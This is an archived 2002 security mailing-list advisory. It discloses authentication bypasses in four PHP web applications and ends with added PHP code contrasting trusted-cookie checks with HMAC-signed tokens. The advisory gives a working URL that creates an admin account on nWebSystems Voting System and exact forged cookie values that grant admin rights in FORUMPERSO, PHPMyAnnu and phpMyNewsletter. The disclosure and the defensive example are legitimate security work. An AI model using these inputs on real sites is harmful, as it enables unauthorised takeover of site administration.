Multiple holes in PHP services.

From: Frog Man (leseulfrogat_private)
Date: Mon Feb 11 2002 - 07:08:49 PST


    The URL 
    http://www.host.com/index.php?loggedin=true&action=auser&new_un=test&new_pw=test&new_pw1=test&new_level=1&submit=Save
    allows creating an admin access (nick: test, password: test) on a 
    nWebSystems Voting System site.
    
    More details in French:
    http://balteam.multimania.com/Tuts/nwebsystemsvs.txt
    
    FORUMPERSO v2.1 :
    Anyone can be admin if he sends the cookies "pass_ok[0]","1" and 
    "pass_ok[1]","admin" to the page 
    http://www.host.com/connect.php3?id_forum=&addr=install.php3.
    
    PHPMyAnnu v2.02 :
    Anyone can be admin if he sends the cookie "phpmyannu_admin_ok","yes" to the 
    page http://www.host.com/path/admin/admin.php3.
    
    phpMyNewsletter v0.6.6 :
    Anyone can be admin if he sends the cookie "adminnews","true" to the page 
    http://www.host.com/admin.php3.
    
    More details in French:
    http://balteam.multimania.com/Tuts/4cookieholes.txt
    
    frog-m@n
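
The cookie issues reported above share one root cause: the admin decision rests on a value the client supplies. The PHP below is an added example, not part of the original post and not code from any of the named applications; it contrasts that pattern with a server-verified token. Only the cookie name "adminnews" comes from the advisory; the function names, the "admin_token" cookie and the token format are assumptions.

```php
<?php
// Added illustration: hypothetical code, not taken from phpMyNewsletter,
// PHPMyAnnu or FORUMPERSO. Function names, the "admin_token" cookie and the
// token layout are assumptions made for this example.

// Flawed pattern: the server believes whatever the cookie says.
function is_admin_flawed(array $cookies): bool
{
    return ($cookies['adminnews'] ?? '') === 'true';
}

// Hardened pattern: after a successful password check the server issues
// "user|expiry|mac", where mac = HMAC-SHA256(key, "user|expiry").
// Assumes user names never contain the '|' separator.
function issue_admin_token(string $user, string $key, int $ttl = 900): string
{
    $payload = $user . '|' . (time() + $ttl);
    return $payload . '|' . hash_hmac('sha256', $payload, $key);
}

function is_admin_hardened(array $cookies, string $key): bool
{
    $token = $cookies['admin_token'] ?? '';
    if (!is_string($token)) {            // reject admin_token[]=... arrays
        return false;
    }
    $parts = explode('|', $token);
    if (count($parts) !== 3) {
        return false;
    }
    [$user, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', $user . '|' . $expiry, $key);
    // Constant-time MAC comparison first, then expiry on the verified value.
    return hash_equals($expected, $mac)
        && ctype_digit($expiry)
        && (int)$expiry >= time();
}

// Constructed demo inputs. The key stays on the server and is never sent.
$key      = random_bytes(32);
$forged   = ['adminnews' => 'true'];
$issued   = ['admin_token' => issue_admin_token('admin', $key)];
$tampered = ['admin_token' => 'admin|9999999999|' . str_repeat('0', 64)];

var_dump(is_admin_flawed($forged));
var_dump(is_admin_hardened($forged, $key));
var_dump(is_admin_hardened($issued, $key));
var_dump(is_admin_hardened($tampered, $key));
```

A server-side session (`$_SESSION`) set only after password verification achieves the same result without a client-held token; either way the client never gets to assert its own privilege level.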
    
    
    



    This archive was generated by hypermail 2b30 : Mon Feb 11 2002 - 10:21:57 PST